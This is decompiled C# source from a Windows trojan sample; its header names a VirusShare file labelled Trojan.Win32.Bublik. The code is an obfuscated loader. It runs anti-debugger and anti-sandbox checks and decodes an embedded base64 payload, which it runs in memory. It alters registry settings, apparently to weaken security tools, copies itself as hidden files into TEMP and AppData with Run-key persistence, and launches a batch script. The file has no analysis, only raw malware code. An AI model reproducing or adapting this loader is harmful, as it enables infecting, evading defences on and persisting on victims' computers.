// Decompiled with JetBrains decompiler // Type:  // Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 5B707792-F182-4802-BE95-B43026E8F1CF // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.CompilerServices; using System.Threading; using System.Windows.Forms; internal sealed class \u0002 { private static \u0003 \u0002 = new \u0003(); private static string \u0003 = \u0008.\u0002(-665676900); private static string \u0005 = \u0008.\u0002(-665676900); private static byte[] \u0008 = new byte[7] { (byte) 98, (byte) 87, (byte) 76, (byte) 65, (byte) 54, (byte) 43, (byte) 32 }; private static byte[] \u0006; private static bool \u000E = false; private static bool \u000F = false; private static bool \u0002\u2000 = true; private static bool \u0003\u2000 = false; private static bool \u0005\u2000 = false; private static bool \u0008\u2000 = false; private static bool \u0006\u2000 = false; private static bool \u000E\u2000 = true; private static bool \u000F\u2000 = false; private static bool \u0002\u2001 = false; private static bool \u0003\u2001 = true; private static bool \u0005\u2001 = false; private static bool \u0008\u2001 = false; private static bool \u0006\u2001 = false; private static bool \u000E\u2001 = false; private static bool \u000F\u2001 = false; private static string \u0002\u2002 = \u0008.\u0002(-665676875); private static string \u0003\u2002 = \u0008.\u0002(-665676839); private static bool \u0005\u2002 = false; private static bool \u0008\u2002 = false; private static bool \u0006\u2002 = false; private static bool \u000E\u2002 = false; private static bool \u000F\u2002 = false; private static bool \u0002\u2003 = true; private static string \u0003\u2003 = \u0008.\u0002(-665676861); private static bool \u0005\u2003 = false; private static bool \u0008\u2003 = false; private static int \u0006\u2003 = 0; private static ThreadStart \u000E\u2003; private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0; private static void \u0002(string _param0, string _param1) { int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand); } private static void \u0002() => Console.Write(\u0008.\u0002(-665677671)); private static void \u0002(string[] _param0) { if (!(\u0002.\u0003 == \u0002.\u0005)) return; \u0002.\u0002(); if (\u0002.\u000F\u2001) { try { if (\u0002.\u000E\u2003 == null) \u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005); new Thread(\u0002.\u000E\u2003).Start(); } catch { } } \u0002.\u0002(); if (\u0002.\u000E) { try { if (Debugger.IsAttached) return; } catch { } } if (\u0002.\u000F) { try { long ticks = DateTime.Now.Ticks; Thread.Sleep(10); if (DateTime.Now.Ticks - ticks < 10L) return; } catch { } } if (\u0002.\u0002\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677682))) return; } catch { } } if (\u0002.\u0003\u2000) { try { Form form = new Form(); form.Text = \u0008.\u0002(-665677636); form.Opacity = 0.0; form.ShowInTaskbar = false; form.Show(); if (form.Text == \u0008.\u0002(-665677647)) return; form.Close(); } catch { } } if (\u0002.\u0005\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677662))) return; } catch { } } if (\u0002.\u0008\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677616))) return; } catch { } } if (\u0002.\u0006\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677626))) return; } catch { } } if (\u0002.\u000E\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677579))) return; } catch { } } if (\u0002.\u000F\u2000) { try { if (\u0002.\u0002(\u0008.\u0002(-665677586))) return; } catch { } } if (\u0002.\u0002\u2001) { try { if (\u0002.\u0002(\u0008.\u0002(-665677795))) return; } catch { } } \u0002.\u0002(); if (\u0002.\u0008\u2003) { try { Thread.Sleep(\u0002.\u0006\u2003 * 1000); } catch { } } \u0002.\u0002(); try { Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805)); \u0002.\u0002(); StreamReader streamReader = new StreamReader(manifestResourceStream); string end = streamReader.ReadToEnd(); \u0002.\u0002(); streamReader.Close(); \u0002.\u0006 = Convert.FromBase64String(end); try { \u0002.\u0002(); Thread thread = new Thread(new ThreadStart(\u0002.\u0003)); \u0002.\u0002(); thread.Start(); \u0002.\u0002(); } catch { } } catch { } \u0002.\u0002(); if (\u0002.\u0005\u2002) { try { Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord); } catch { } try { if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null) { Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722)); Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord); } else Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord); Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord); } catch { } if (\u0002.\u0008\u2002) { if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null) { Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354)); Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord); } else Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord); } if (\u0002.\u0006\u2002) { try { new Process() { StartInfo = { FileName = \u0008.\u0002(-665677560), Arguments = \u0008.\u0002(-665677508), UseShellExecute = false, CreateNoWindow = true } }.Start(); } catch { } } if (\u0002.\u000E\u2002) { try { if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null) { Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722)); Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord); } else Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord); } catch { } } if (\u0002.\u000F\u2002) { try { if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null) { Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722)); Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord); } else Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord); } catch { } } } \u0002.\u0002(); if (\u0002.\u0002\u2003) { try { Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord); } catch { } try { FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read); byte[] buffer = new byte[fileStream1.Length]; fileStream1.Read(buffer, 0, buffer.Length); fileStream1.Close(); FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create); fileStream2.Write(buffer, 0, buffer.Length); fileStream2.Close(); fileStream2.Dispose(); FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create); fileStream3.Write(buffer, 0, buffer.Length); fileStream3.Close(); fileStream3.Dispose(); File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden); File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden); } catch { } try { Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003)); Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003)); } catch { } if (\u0002.\u0005\u2002) { try { if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null) { Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073)); Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003)); } else Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003)); } catch { } } } \u0002.\u0002(); if (!\u0002.\u0005\u2003) return; try { if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)))) return; string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247); TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)); textWriter.WriteLine(str); textWriter.Close(); new Process() { StartInfo = { FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)), UseShellExecute = false, CreateNoWindow = true } }.Start(); } catch { } } public static void \u0003() { try { \u0002.\u0002(); Assembly assembly = Assembly.Load(\u0002.\u0006); MethodInfo entryPoint = assembly.EntryPoint; \u0002.\u0002(); entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1] { (object) new string[0] }); } catch { try { \u0002.\u0002(); Assembly assembly = Assembly.Load(\u0002.\u0006); MethodInfo entryPoint = assembly.EntryPoint; \u0002.\u0002(); entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]); } catch { try { \u0002.\u0002(); MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint; \u0002.\u0002(); entryPoint.Invoke((object) null, (object[]) null); } catch { try { \u0002.\u0002(); \u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath); \u0002.\u0002(); } catch { } } } } } private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002); }